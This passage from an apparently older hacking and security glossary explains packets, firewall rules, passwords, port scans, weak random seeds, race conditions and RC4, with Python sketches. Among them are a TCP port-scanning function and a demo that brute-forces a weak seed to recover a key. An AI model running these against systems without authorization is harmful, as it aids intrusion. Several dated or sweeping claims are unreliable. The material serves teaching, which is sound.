All data sent across the Internet is broken up into packets, sent individually across the network, and reassembled back into the original data at the other end.

Analogy: Imagine looking at an automobile freeway during rush hour from an airplane. The freeway looks like a flowing river, but each individual car (packet) is really independent from all the others. While it looks like the cars on the freeway are going in the same direction, each car really has its own source and destination separate from the others around it. This is how Internet core routes look.

Analogy: Now consider that a bunch of coworkers leave the office and go to a party. Each gets in his/her own car and drives to the party. Each person may take a slightly different route, but they all end up together at the party. This demonstrates how data is broken up into individual packets, sent across the Internet (potentially following different routes), then reassembled back again at the destination.

Key point: Conceptually, networking occurs at abstract layers well above the concept of packets. Users type in a URL, and the file is downloaded. By dealing with the raw packets themselves, hackers are frequently able to subvert communications in ways not detectable at these higher layers.

Contrast: The term "packet switched network (PSN)" is used to describe the Internet, whereas the term "circuit switched network (CSN)" is used to contrast it with the traditional phone system. The key difference is that in the phone system, the route between two people is set up at the start, and each bit in the stream follows that route. On the Internet, each packet finds its own route through the system, so during a conversation, the packets can follow different paths, and indeed arrive out-of-order. Another key difference is latency. The phone system forwards each bit one at a time, so as soon as a bit arrives, it can be forwarded on without waiting. On the Internet, bits are bunched together before transmission. Each hop must wait and receive all the bits before forwarding any of them on. Each hop therefore adds a significant amount of delay. Gamers know this as the "ping" time.

Key point: There are other technologies that use packets, not just the Internet. Before the Internet came along, X.25 networks were a popular form of packet-based communication (and indeed, X.25 formed the basis for many links on the nascent Internet).

packet filter [3]

In firewalls, packet filters are the technology most often used to control traffic. Every packet contains the following fields:

source IP address (example: 192.0.2.156)
destination IP address
transport type (example: TCP=6, UDP=17, ICMP=1)
source port (example: HTTP=80, DNS=53, FTP=21)
destination port
flags (example: SYN)

This data is compared against "rules" within the firewall. A typical set of rules might be:


BLOCK destination=192.0.2.x TCP flag=SYN

ALLOW destination=192.0.2.123 TCP destport=80

ALLOW destination=192.0.2.124 TCP destport=25

If our private network is 192.0.2.x, then the first rule above blocks all incoming TCP connections (though outbound connections would still be allowed). The following rules override the first, allowing access to the webserver at port 80 and access to the e-mail server at port 25.
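
The rule set above can be sketched in Python as follows. This is a simplified model, not how any real firewall is implemented: the `Packet` and `Rule` classes are hypothetical, "flag=SYN" is interpreted as "SYN set without ACK" (a new connection attempt), and the default verdict of ALLOW is an assumption made only so that outbound traffic passes as the text describes.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str                       # "TCP", "UDP" or "ICMP"
    dst_port: int = 0
    flags: frozenset = frozenset()


@dataclass(frozen=True)
class Rule:
    action: str                      # "ALLOW" or "BLOCK"
    dst_net: str                     # destination network in CIDR form
    proto: str
    dst_port: Optional[int] = None   # None matches any port
    new_connection: bool = False     # True: match only SYN without ACK

    def matches(self, pkt: Packet) -> bool:
        if pkt.proto != self.proto:
            return False
        if ip_address(pkt.dst) not in ip_network(self.dst_net):
            return False
        if self.dst_port is not None and pkt.dst_port != self.dst_port:
            return False
        is_new = "SYN" in pkt.flags and "ACK" not in pkt.flags
        if self.new_connection and not is_new:
            return False
        return True


RULES = [
    Rule("BLOCK", "192.0.2.0/24", "TCP", new_connection=True),
    Rule("ALLOW", "192.0.2.123/32", "TCP", dst_port=80),
    Rule("ALLOW", "192.0.2.124/32", "TCP", dst_port=25),
]


def decide(pkt: Packet, rules=RULES, default: str = "ALLOW") -> str:
    """Later rules override earlier ones, so the last matching rule wins."""
    verdict = default
    for rule in rules:
        if rule.matches(pkt):
            verdict = rule.action
    return verdict
```

Many real firewalls use first-match ordering instead; the last-match ordering here simply mirrors the "following rules override the first" wording of the example.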

Key point: The basic stance of a company firewall is:

blocks all UDP traffic except for DNS
blocks all incoming TCP connections but allows all outgoing ones
allows incoming connections to public HTTP, FTP, SMTP, and DNS servers located in a "DMZ".
blocks all ICMP traffic except for those packets needed for path MTU discovery.

This allows most access to the Internet for end-users and allows the Internet to access the public servers. It blocks everything else.

Contrast: The term "dynamic packet filter" was coined to contrast with the normal "static filter" rules in a firewall described above. Dynamic rules are needed because:

Ports are a poor way of identifying protocols (and getting poorer)
Whereas most communication uses only outbound connections, some (like FTP) use multiple connections in both directions.

In the case of FTP, the client creates an outbound connection to the server, then the server creates separate inbound connections in order to transfer files to the client. Static firewall rules would block these incoming connections; dynamic rules monitor the state and temporarily change the static rules just to allow them. An example of a "dynamic" rule that solves the FTP problem is:

Block all incoming connections, but if the user has established a connection to port 21 on a server, then allow incoming TCP connections from port 20 on that server to ports higher than 1024 on the client.

Another type of "dynamic" rule is one where the firewall does protocol analysis at layers higher than TCP. To contrast with the example above, the firewall might analyze the FTP control connection looking for the PORT command. (The "PORT" command is the part of the FTP protocol whereby the client tells the server which port it has opened to receive a file on.) Check Point calls this protocol analysis "stateful packet inspection" in their firewall. Other vendors do similar things, but call them by different names.
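
As a rough Python sketch of that second approach: the FTP PORT command carries six comma-separated numbers, four for the IP address and two for the port (high byte, then low byte). The `pinholes` set and both function names are hypothetical, and the sketch skips the validation a real firewall would need (for example, checking that each number fits in a byte).

```python
import re

# Temporary "pinholes" the firewall has opened: (client_ip, client_port)
pinholes = set()

PORT_RE = re.compile(r"^PORT (\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\r?\n?$")


def inspect_ftp_line(line: str) -> None:
    """Watch the FTP control connection; open a pinhole when PORT is seen."""
    m = PORT_RE.match(line)
    if not m:
        return
    h1, h2, h3, h4, p1, p2 = (int(g) for g in m.groups())
    ip = f"{h1}.{h2}.{h3}.{h4}"
    port = p1 * 256 + p2          # PORT encodes the port as two bytes
    pinholes.add((ip, port))


def allow_inbound(dst_ip: str, dst_port: int, src_port: int) -> bool:
    """Allow an inbound connection only from server port 20 to an announced port."""
    return src_port == 20 and (dst_ip, dst_port) in pinholes
```

Unlike the port-range rule, this opens only the exact port the client announced, and only after the client has announced it.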

password [1]

A string of characters that a user must know in order to gain access to a system.

Key point: The most important defensive mechanism that a corporation can take is to create and enforce policies about proper password usage.

Key point: A leading cause of compromise is programs that leave behind default passwords. Another leading cause is users who choose weak passwords that can easily be guessed or cracked.

Tools: The crack programs can be used to maintain a strong policy.

Tools: On Windows NT, the "passflt.dll" and "passprop.exe" tools can be used to enforce strong passwords.

Misunderstanding: People used to believe that a good password was a random mix of UPPER and lower case, numbers, and punctuation. However, this generates passwords that are impossible for users to remember, so they find ways around the restriction, such as writing passwords down on Post-It notes. Therefore, somebody can compromise the network by simply looking for Post-It notes (such as pasted to the bottom of a keyboard).

Controversy: Many policies declare that a password must be changed frequently, and most OSes come with tools for enforcing this. However, this leads to the same problem as above: it causes pain for users, so they behave in ways that reduce security. Also, it isn't clear that it dramatically increases security.

Contrast: Passwords aren't the only authentication scheme possible. Crypto-cards are often used to generate "one-time passwords" or challenge-response authentication.

Tip: Use a PalmPilot and a crypt program to store your many passwords.

See also: grind, crack, password cache, 8-character password.

password cache [3]

A temporary copy of the password. Internal to the computer, password information is constantly being checked. If you were queried for the password each and every time, you would find that the computer would become unusable. Therefore, the computer attempts to "cache" the password so that internal prompts during the same session do not cause external prompts to the user.

Key point: All systems cache passwords in memory during a login session. Therefore, if a hacker can gain access to all memory on the system, he/she can likely sift the memory for passwords. Likewise, hackers can frequently sift pagefiles for passwords.

Key point: Many programs whose goal is ease-of-use will ask the user if they want to save the password on disk (in a file or the registry). For example, the MS Outlook e-mail client has this feature to cache POP3 passwords. Therefore, hackers have programs that will sift the file system or registry for these passwords. Some systems store these cached passwords in clear-text; others attempt to encrypt them, but usually this encryption mechanism can be defeated.

PBX (Private Branch Exchange) [3]

The PBX forms the hub of a company's phone system. Phreakers hunt for PBXs that they can bounce calls through, especially long distance calls.

people [3]

The following is a list of people in the security community who are noteworthy for their accomplishments.

Bruce Schneier: His book, Applied Cryptography is the standard book for both beginners and experts. Get a copy now. He is also the creator of the Blowfish encryption algorithm.

PERL [4]

A popular cross-platform scripting language.

Key point: v5 of PERL has the concept of "tainted" input that cannot be passed raw to the operating system without preprocessing. This is an amazingly useful feature that solves the majority of input validation problems in CGI scripts.

pgp (pretty-good-privacy) [2]

Popular encryption program. It was created by a fellow named Phil Zimmermann as a subversive act. Phil later exploited it as a social-engineering attack against the business community.

Key point: All true hackers use open-source versions of PGP to encrypt their data.

phf [4]

One of the first major cgi-bin attacks, found in 1996 by Jennifer Myers.

Key point: This attack has become "classic". Virtually all CGI scanners search for it, and the typical intrusion detection system will trigger on it.

Key point: It falls victim to the input validation problem in order to allow for directory climbing.

philosophy [1]

Discussions of infosec and hacking are governed by certain philosophical points of view.

Usability != Security: Any company following robust security practices will generate complaints from the users.
You cannot escape human nature: If you block users from doing things, they will find ways around your blocks. Example: If you block all incoming traffic but HTTP to a webserver, then your database people will put database front-ends on your webserver. If you put personal firewalls on users' desktops that block interesting traffic, they will disable the entire firewall.
Security through obscurity: The failed point of view that simply hiding will protect you, such as "Nobody can find my machine in the vastness of the Internet, therefore I don't have to password protect it.". Note that you should still hide details as much as possible, but you should "harden" your systems properly.
fail-open vs. fail-close: When a system fails, how should it leave things: open or closed? For example, if a firewall crashes, should it disable all network connectivity, or should it allow network connectivity to continue unprotected?

phreaking [2]

Hacking the phone system.

Key point: Most of the literature available on the net applies to phone systems that are 20 years old. These techniques rarely work on modern phone systems.

Key point: 2600 Hz is the frequency of the toy whistle once given away in Cap'n Crunch cereal boxes; it was also a signaling frequency for phone systems in the 1960s.

ping [1]

The "ping" command is built into both Windows and UNIX machines as a universal way of testing network response time and performance. The name is really based on the similarity to sonar pings, though many people have created a post hoc acronym, "Packet INternet Groper".

Example: The ping-of-death attack used IP fragmentation to crash systems. It was so named because the ping program built into Windows could easily be told to fragment packets this way.

Key point: Even though the ping program is simple, it can be abused. Some versions can be commanded to send packets as fast as possible, which is often done to flood networks. Most versions allow the packet size to be set to a large size, forcing fragmentation. When used with the flood above, it can overload machines since fragmentation reassembly is so slow.

PKI (Public Key Infrastructure) [3]

PKI is largely a marketing buzzword by RSA.

plaintext [3]

A message that is not encrypted and therefore easily read.

Key point: Depending upon context, plaintext can refer to the contents of a message before encryption, after it has been decrypted, or even a message that is in the "clear" and not encrypted at all.

Key point: Many networking protocols use plaintext passwords that can simply be sniffed off the wire.

policy [3]

In corporations, the document that explains/clarifies the security stance of the corporation.

Key point: Nerds hate bureaucracy, and frequently resist clarifying the security stance. Policy statements are frequently useful, and small ones given to new employees help prevent a lot of problems before they start. They are also useful CYA: when an executive starts complaining about something not working through the firewall, it helps to pull out the Policy and explain that it isn't allowed.

Key point: Policy documents bring out the "process" bureaucrats who will spend hours debating the policy in order to avoid real work that they might be judged upon. As a result, many companies spend a lot of effort creating useless policy documents.

Key point: A good rule of thumb: only put things in the policy document that include a plan on how you enforce it. For example, if you say "users should choose strong passwords", include a plan on how to enforce them.

Example: A policy might contain the following items:

privacy policy: Web-sites frequently declare what information they collect and store about visitors. Software products have been caught invading people's privacy and are beginning to have similar statements included with them. Corporations have the ability to read users' e-mail and monitor their activities. Finally, new U.S. regulations require special handling of a person's private medical data.
access policy: Who has access to what and why. A common problem inside companies is that they allow too much access to too many people for convenience's sake.
accountability
authentication
availability: Which resources must be available 24x7.
Internet usage policy: Example: no porn sites.
violation handling: What actions are taken when an employee violates the guidelines?
incident handling: What happens when a hacker is detected?

POP3 (Post Office Protocol v3) [1]

This is the most popular protocol for picking up e-mail from a server. The e-mail client program will open a connection to port 110 on the server, then pull down each e-mail message from the server.

Key point: Since e-mail is one of the most popular services on the Internet, there are a huge number of different implementations of POP3 services.

port [1]

In TCP/IP, a port is an extension of an Internet address that tells which program is to receive the data. In other words, if I send data to 192.0.2.111, port 110, then I'm talking to the POP3 e-mail service. However, if I send something to port 80 on the same machine, then I'm talking to the web server on that machine.

Key point: I can have two URLs that look like http://www.robertgraham.com:80/ and http://www.robertgraham.com:90/. These two URLs access different web server programs running on the same machine, one at port 80 and the other at port 90.
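
For illustration, Python's standard `urllib.parse` module splits those two URLs into the same host name but different port numbers:

```python
from urllib.parse import urlsplit

for url in ("http://www.robertgraham.com:80/", "http://www.robertgraham.com:90/"):
    parts = urlsplit(url)
    # Same host name, different port: a different program receives the data.
    print(parts.hostname, parts.port)
```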

port scan [2]

In hacker reconnaissance, a port scan attempts to connect to all 65536 ports on a machine in order to see if anybody is listening on those ports.

Contrast: A stealth scan attempts to evade detection. The most common kind is a TCP half-open scan which fails to complete the three-way handshake. This prevents the application listening on a port from being notified that a connection attempt has taken place, so it won't log that fact. Most "stealth" scans attempt to evade logging on the host, but this creates more distinctive signatures that intrusion detection systems can detect.

Key point: Port scans are not illegal in many places; laws on the subject have yet to be written. The Norwegian Supreme Court ruled that they are not illegal because they don't actually compromise the system. There is also the technical problem that they can easily be spoofed, so it is hard to prove guilt. There is even a third problem: virtually any machine on the Internet can be tickled into scanning somebody else; the hacker doesn't break into that third party, but triggers special conditions that cause the effect of a port scan.

Controversy: Many people think that port scanning is an overt hostile act and should be made illegal.

Contrast: Full port scans of all 65536 ports are rarely seen, especially since they are so obvious. Instead, a hacker will strobe for just the ports he/she is interested in. These strobes are typically for fewer than 10 ports. Also, the hacker will often sweep thousands (or millions) of machines rather than a single machine, looking for any system that might be vulnerable.
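
A strobe of a handful of ports can be sketched with a plain TCP connect, which is the noisy, non-stealth kind of scan. The `strobe` function is an illustrative helper, not a stand-in for a real scanner, and should only be pointed at machines you are authorized to test.

```python
import socket


def strobe(host: str, ports, timeout: float = 0.5) -> dict:
    """Try a full TCP connect to each port; report which ones accept."""
    results = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising an exception
            results[port] = (s.connect_ex((host, port)) == 0)
    return results
```

For example, `strobe("127.0.0.1", [21, 25, 80, 110])` checks four common service ports on the local machine. Because each probe completes the three-way handshake, the listening application sees (and can log) every attempt.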

Tool: The best tool for doing port scans is nmap from http://www.insecure.org/nmap.

PPP [3]

The standard protocol for connection via a modem to an ISP. TODO:

privilege escalation [4]

A classic attack against a system. A user has an account on a system, and uses that account to gain additional privileges they weren't meant to have.

Key point: Virtually all local exploits are privilege escalation attacks.

Key point: The most common example of this attack is through setuid programs that have known bugs in them, often through buffer overflows or race conditions.

protocol [3]

The rules that govern how things communicate over the network.

Key point: By manipulating the raw protocol themselves, hackers can do powerful things that are impossible in an application. For example, client applications typically limit the length of a username that can be typed in. By manipulating the raw protocol, hackers can supply any sized username they want, sometimes causing a buffer overflow exploit.

Key point: Protocols are either text-based or binary. Text-based protocols can be read directly off the wire and manipulated directly. Binary protocols require a protocol analyzer to decode them, and must be manipulated programmatically.
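
The difference shows up clearly in a short Python sketch. The username and the DNS field values below are arbitrary illustration values:

```python
import struct

# Text-based: a POP3 login command is just readable ASCII ending in CRLF.
text_msg = b"USER alice\r\n"
print(text_msg.decode("ascii").strip())

# Binary: a 12-byte DNS header packs six 16-bit big-endian fields.
# The ID and flag values here are arbitrary illustration values.
dns_header = struct.pack("!6H", 0x1234, 0x0100, 1, 0, 0, 0)
ident, flags, qdcount, ancount, nscount, arcount = struct.unpack("!6H", dns_header)
```

The POP3 line can be typed by hand into a raw connection, while the DNS header is meaningless to the eye until code (or a protocol analyzer) unpacks its fields.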

See also: See the section on "banners" for examples of what some protocols look like on the wire.

protocol stack [3]

In networking, protocols are layered on top of each other, with each layer responsible for a different aspect of communication. For TCP/IP, the protocol stack looks something like:

HTTP	Telnet	POP3	SNMP	bootp
TCP			UDP		ICMP
IP						ARP
PPP			Ethernet

Read the diagram as follows: You use the protocol HTTP to request a web-page. The HTTP client (web-browser) contacts the HTTP server (web-site) using the protocol TCP. The protocol TCP segments all its work into IP packets. Routers on the Internet know how to forward the IP packets, but are clueless as to whatever is inside the IP packets. Your machine will use something like PPP or Ethernet in order to send IP packets to the nearest router.

Key point: Encryption can happen at any layer.

Payload: The data itself can be encrypted independent of the protocols used to transport it. For example, a typical use of PGP is to encrypt a message before sending via e-mail. All the e-mail programs and protocols are totally unaware that this has occurred.

Application Layer: Some applications have the ability to encrypt data automatically. For example, SMB can encrypt data as it goes across the wire.

Transport Layer: SSL is essentially encryption at the transport layer.

Network Layer: IPsec provides encryption at the network layer, encrypting all the contents above IP, including the TCP and UDP headers themselves.

proxy [3]

In communications, a proxy is something that acts as a server, but when given requests from clients, acts itself as a client to the real servers.

Analogy: Consider talking to somebody who speaks a foreign language through a translator. You talk to the translator, who receives your statements, then regenerates something else completely to the other end. The translator serves as your proxy.

Key point: The communication terminates at the proxy. In other words, the proxy doesn't forward data so much as it tears it completely apart. For example, an HTTP proxy doesn't forward every request sent through it. Instead, it first examines if it already has the requested web page in its cache. If so, then it returns that page without sending another request to the destination server. Because proxies completely terminate the communication channel, they are considered a more secure firewall technology than packet filters, because they dramatically increase the isolation between the networks.
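
A toy Python model of the caching behavior described above. The `CachingProxy` class and its `fetch_from_origin` callback are hypothetical names, and a real HTTP proxy would also have to honor expiry and cache-control headers:

```python
from typing import Callable, Dict


class CachingProxy:
    """Answers clients itself; contacts the origin only on a cache miss."""

    def __init__(self, fetch_from_origin: Callable[[str], bytes]):
        self._fetch = fetch_from_origin   # the proxy's own client-side request
        self._cache: Dict[str, bytes] = {}
        self.origin_requests = 0

    def handle(self, url: str) -> bytes:
        if url not in self._cache:
            self.origin_requests += 1
            self._cache[url] = self._fetch(url)
        return self._cache[url]
```

The client's request ends at `handle`. Any request that reaches the origin server is a new one made by the proxy, which is the isolation the key point describes.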

Key point: You will occasionally be scanned for proxies. ISPs scan their users for proxies. Hackers scan the Internet looking for proxies they can anonymize their connections with. Certain servers (like IRC servers) scan clients for proxies in order to prevent anonymous connections. Several websites maintain lists of such proxies (e.g. http://proxys4all.cgi.net/).

public-key (private-key) [3]

TODO:

Key point: Protecting the "private key" from theft/disclosure is the most important thing any company can do. There exist private keys whose value lies in the range of hundreds of millions if not billions of dollars (such as the key Verisign uses to sign certificates).

The private key is usually protected with strong encryption based upon a strong password. In paranoid cases, parts of the password are given to different people, so that more than one person must be present in order to recover the private key for use (note: redundancy is also used: if the key is XYZ, then Alice knows XY, Bob knows YZ, and Charlene knows XZ, meaning that any two can unlock the private key).
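
The XY / YZ / XZ arrangement can be sketched directly in Python. The function names and the example password are illustrative assumptions:

```python
def split_three_ways(secret: str) -> dict:
    """Cut the secret into parts X, Y, Z and give each person two of them."""
    third = -(-len(secret) // 3)                 # ceiling division
    x, y, z = secret[:third], secret[third:2 * third], secret[2 * third:]
    return {
        "Alice": {"X": x, "Y": y},
        "Bob": {"Y": y, "Z": z},
        "Charlene": {"X": x, "Z": z},
    }


def recover(share_a: dict, share_b: dict) -> str:
    """Any two people together hold all of X, Y and Z."""
    parts = {**share_a, **share_b}
    return parts["X"] + parts["Y"] + parts["Z"]
```

Note that in this simple arrangement each person alone already knows two thirds of the password. Threshold schemes such as Shamir's secret sharing are designed so that a single share reveals nothing.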

The paranoid things you see in movies about high-security installations apply:

background checks on employees with access to the private key
physical security consisting of photo IDs, searches, and strict entry/exit controls
the two-person rule
biometrics (retina/palm/finger/handwriting) additions to normal authentication
physical keys

Private-keys are frequently stored on separate objects. The most common is the floppy disk, which can be inserted into a server when booted, but removed to a safety deposit box. Other examples include crypto-cards. (Note: when you get a certificate from a CA, they usually require that the private-key never be stored on a computer.)

Servers that must use private keys must employ heavy countermeasures:

intrusion detection systems
firewalls (both packet filtering as well as more complex ones)
frequent vulnerability assessments and auditing
limited people who have access to the server
full use of the security features of the server (i.e. turn on logging, enforce strong passwords, etc.)

- Q -

quantum computing [4]

Quantum mechanics challenges our notion of reality in much the same way that heliocentricity (sun at center of the solar system) challenged people in the 1600s. Quantum computers don't necessarily make computers faster, but they can make exponential problems tractable. In other words, they won't make your game faster, but they can be used to crack encryption keys dramatically faster.

Analogy: Consider a basketball player who shoots a perfect shot aimed right towards the basket. However, an intervening player intercepts the shot and blocks it. Quantum mechanically, the basketball simultaneously was blocked and went into the basket. The act of observers watching the game caused reality to snap into focus along one state or the other. Of course, quantum mechanics doesn't apply to basketballs, but it does apply to photons (little balls of light). So far, the best explanation for the behavior of photons is much like the basketball game above. It makes no intuitive sense.

Details: A half-silvered mirror reflects roughly half the light and lets the other half through. However, light is carried by photons (aka quanta). If you shine a laser light at a half-silvered mirror, it appears that roughly half the light goes through and the other half is reflected. There are three ways of interpreting this:

roughly half the photons take the reflected path, the other photons take the straight-through path
each photon is split in half (into smaller photons), each half traveling a different path
each photon is both reflected and not-reflected at the same time, and the act of observing the photon long after it passes the mirror causes it to decide which path it took

Option number three makes no sense, but is the only one that matches experimental evidence.

Key point: A quantum bit, or qubit, holds two values just like a normal bit. However, quantum bits can be combined such that two qubits hold four values, three qubits hold eight values, and four qubits hold 16 values. Thus, just 30 qubits can hold about a billion (2^30) values at once. It isn't that easy, but the upshot is that a quantum computer can address exponential problems because it can apply exponential resources to them.

Key point: So far, it seems that the most useful form of quantum computing is quantum cryptography. Researchers have shown ways to crack symmetric keys, factor large numbers to break public keys, and exchange keys.

- R -

Rainbow Series [2]

A series of books published by the NSA on evaluating "Trusted Computer Systems (TCS)". There are generally two types of security people: those that come from government/big-business/military who use terms well defined in the Rainbow Series vs. more relaxed long-hair types that use colloquial terms from the hacker community.

random [4]

Key point: Most software-based random number generators are not cryptographically secure. As a result, many cryptosystems have been broken by attacking the generator of session keys. Versions of Netscape and Microsoft browsers have been broken this way. For example, Netscape used the current time and process ID to seed its random number generator.
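
The following Python sketch shows why a time-and-PID seed is weak. It is not a reconstruction of the actual browser code: the seed-mixing formula, the timestamp, and the PID are made-up assumptions, and Python's `random` module stands in for any non-cryptographic generator.

```python
import random


def session_key(seed: int) -> bytes:
    """Derive a 128-bit 'session key' from a non-cryptographic PRNG."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(16))


def weak_seed(timestamp: int, pid: int) -> int:
    # Hypothetical mixing of time and PID; the real browser's formula differed.
    return (timestamp << 16) ^ pid


# Victim generates a key at some second, with some process ID.
victim_key = session_key(weak_seed(961632000, 4242))


def crack(key: bytes, around: int, slack: int = 2):
    """Attacker knows the time to within a few seconds; tries every 15-bit PID."""
    for t in range(around - slack, around + slack + 1):
        for pid in range(1, 32768):
            if session_key(weak_seed(t, pid)) == key:
                return t, pid
    return None
```

Although the key is 128 bits long, the attacker only has to search a few hundred thousand seeds, because that is all the unpredictability that went into it.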

Key point: Modern computers come with hardware-based random number generators that base their seeds upon electronic noise. This solves the problem of the impossibility of pure-software random number generators being truly random, or the inefficiency/hackability of entropy-gathering random number generators. These are either in the CPU, the chipsets, or crypto hardware.

Contrast: Software random number generators cannot be perfectly random, so they are called pseudo random number generators (PRNG). Because they cannot generate perfectly random numbers, they usually query the user for some random seed information when they start up. For example, when you install PGP, you type at the keyboard some random text. The program measures the time spacing between keystrokes, then saves that information in a file. That file then serves as the seed information for future cryptographic purposes. For the most part, such seeds are considered strong enough for cryptographic purposes because they represent more bits of information than are used in most keys. A PRNG is in contrast to a TRNG (Truly Random Number Generator).

Key point: Software random number generators generally start with a single seed from which all other numbers are generated. This can be used as a pre-compression mechanism: if you need to generate lots of random data, then store it, you can instead simply store the seed for the pseudo-random number generator. For example, the game "Diablo" generates a random level every time. They could base this on a seed, and simply store the seed and regenerate the level accordingly. They don't -- which leads to lots of disk space being used up.
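
A small Python sketch of the "store the seed, not the data" idea. The map format is invented for illustration and has nothing to do with how any actual game stores its levels:

```python
import random


def generate_level(seed: int, width: int = 16, height: int = 8) -> list:
    """Rebuild the same pseudo-random map from nothing but the seed."""
    rng = random.Random(seed)
    return ["".join(rng.choice("#.") for _ in range(width)) for _ in range(height)]


saved_game = {"level_seed": 1337}          # a few bytes on disk
level = generate_level(saved_game["level_seed"])
```

Calling `generate_level` again with the same seed reproduces the identical map, so only the seed needs to be saved.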

Key point: The output of hash or encryption algorithms produce what appears to be random data. In fact, their security depends upon this. The goal of cryptanalysis is to hunt deep within the data for patterns. As a byproduct, this also means that cryptographic algorithms can also be used as a pseudo-random number generator.

Key point: There are systems known as entropy-gathering PRNGs: they gather some entropy from the environment and whiten it with standard PRNGs (such as hash functions). Sources of entropy in the system are:

keyboard interrupts
mouse movements
disk interrupts (whose timing is dependent upon when the disk head seeks to the correct position).
current timestamp
clock skew from real time (i.e. if your internal PC clock needs to be adjusted by 1.3 seconds per week, you can throw that into the PRNG).
network traffic
memory access times
any other system interrupt

There exists such a system for UNIX called /dev/random, which represents a "file" containing totally random information. A similar device driver for DOS ("NOISE.SYS") generates a pseudo file called "RANDOM". While APIs already exist to access this info, having a pseudo file makes the code more easily portable.

Key point: The randomness or entropy of a system can be measured. The table below lists some algorithms that measure entropy, and their measurements when run against this document:

Algorithm	Description	My entropy
ent	http://www.fourmilab.ch/random/	5 bits
MUST (Maurer's Universal Test)	Another measurement system.	4 bits
Diehard	TBD	?
WinZIP	By definition, a compression program reduces redundancy. Therefore, the percentage compression is a fair measure of entropy. Compresses this file down to 18% its original size, which one can consider an entropy of 1.5 bits per byte.	1.5 bits

Note that ent and MUST are good measurements of randomness only if the input is nearly random. WinZIP is only a good measure of randomness if the input is mostly redundant. For example, MUST claims that my WinZIP file is 99.7% random, and ent claims it is 99.92% random. These are closer to being accurate.
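Example: A rough sketch of two such measurements in Python. The first is a simple byte-frequency (zero-order Shannon) estimate, similar in spirit to what ent reports but not a reimplementation of it. The second uses zlib as a stand-in for WinZIP, which is an assumption; different compressors give different ratios.

```python
import math
import zlib
from collections import Counter

def shannon_bits_per_byte(data):
    """Byte-frequency entropy estimate: 0.0 (constant) up to 8.0 (uniform)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def compression_bits_per_byte(data):
    """Compressed size expressed as bits of output per byte of input."""
    compressed = zlib.compress(data, 9)
    return 8.0 * len(compressed) / len(data)

sample = b"the quick brown fox jumps over the lazy dog " * 200
print(shannon_bits_per_byte(sample), compression_bits_per_byte(sample))
```

The same arithmetic gives the WinZIP row: a file that compresses to 18% of its size works out to 0.18 x 8 = 1.44 bits per byte, which the table rounds to 1.5.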

Misconception: It is pointless measuring the entropy/randomness of anything whitened by a hash function or encrypted, unless you are measuring the hash/encryption function itself. For example, when evaluating a system that gathers entropy (described above), measure that data before it gets whitened.

race condition [3]

In computer science, the term race condition refers to when two processes attempt to carry out conflicting actions at the same time. It is said that these two processes race to see who completes first. They exist throughout code because under normal conditions, one process tends to be faster than another and completes first (and if that is the expected outcome, the bug is never detected). By slowing down one process or speeding another, hackers can exploit race conditions in order to break into systems. These are typically only local exploits.

Analogy: Create a file on the disk called "rob.txt" containing the word "foo". Open the file in an editor and add the word "bar". However, before saving the file open it again in another editor and add the word "baz". Now save the first file, then save the second file, and exit both editors. The file now contains "foo baz", and the changes for "bar" are completely lost. Note: this may not work for you, because some editors check for this condition so that you can't make a mistake.
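Example: The analogy can be replayed as a short Python sketch. The two "editors" are just variables holding a copy of the file, and the helper names are hypothetical. The steps run in a fixed order here so the lost update is reproducible; in a real race the order depends on timing.

```python
import os
import tempfile

path = os.path.join(tempfile.mkdtemp(), "rob.txt")
with open(path, "w") as f:
    f.write("foo")

def open_in_editor(path):
    # Each editor works on its own private copy of the contents.
    with open(path) as f:
        return f.read()

def save_from_editor(path, buffer):
    # Saving overwrites the whole file with the editor's copy.
    with open(path, "w") as f:
        f.write(buffer)

editor1 = open_in_editor(path) + " bar"
editor2 = open_in_editor(path) + " baz"   # opened before editor1 saved
save_from_editor(path, editor1)           # file is now "foo bar"
save_from_editor(path, editor2)           # overwrites it; "bar" is lost
final = open_in_editor(path)
print(final)
```

Neither editor did anything wrong on its own; the bug is that both read before either wrote.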

RC4 [3]

Rivest Cipher 4. A symmetric stream cipher developed by RSA.

Uses:

SSL, which means RC4 is built into your browser.
CDPD (Cellular) connections for your Palm modem using OmniSky.

Key point: RC4 supports variable-length keys, but US restrictions limit it to 40-bit keys when US companies export products using RC4.
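Example: A compact sketch of the publicly posted RC4 algorithm in Python, for illustration only (it is not RSA's code and should not be used to protect anything). It shows that the key can be any length: a 40-bit export key is simply 5 bytes, a 128-bit key is 16 bytes.

```python
def rc4(key, data):
    """Encrypt or decrypt data with RC4 (the operation is its own inverse)."""
    # Key scheduling: shuffle the 256-entry state table using the key bytes.
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) % 256
        state[i], state[j] = state[j], state[i]
    # Keystream generation: XOR one keystream byte into each data byte.
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) % 256])
    return bytes(out)

export_key = b"\x01\x02\x03\x04\x05"   # 5 bytes = 40 bits (made-up value)
strong_key = bytes(range(16))          # 16 bytes = 128 bits (made-up value)
ciphertext = rc4(export_key, b"attack at dawn")
print(rc4(export_key, ciphertext))
```

Only the key length differs between the weak and strong versions; the algorithm is identical.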

Key point: RC4 was a trade secret until somebody reverse engineered it and posted the source code on the net. It isn't patented. Therefore, RSA is trying to move all its customers to RC5, which is both patented and copyrighted.

RC5 [3]

The successor to RC4.

Key point: In order to promote RC5, RSA conducts contests that pay people if they can crack it. The first contest used a 56-bit key, which took http://www.distributed.net/ 212 days to crack using a total of roughly 1 million computers that tried about 35,000,000,000,000,000 of the 2^56 (roughly 72,000,000,000,000,000) possible keys. The message was "It is time to move to a longer key length.", and it was encrypted using the key 0x532B744CC20999.
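Example: The arithmetic behind those figures, as a small Python sketch. It assumes only that a 56-bit key means 2^56 candidate keys and takes the day count and key count from the paragraph above; the derived rate is an average, not a measured number.

```python
keyspace = 2 ** 56                       # every possible 56-bit key
tried = 35_000_000_000_000_000           # keys tested, from the text above
days = 212                               # duration, from the text above

fraction_searched = tried / keyspace     # share of the keyspace covered
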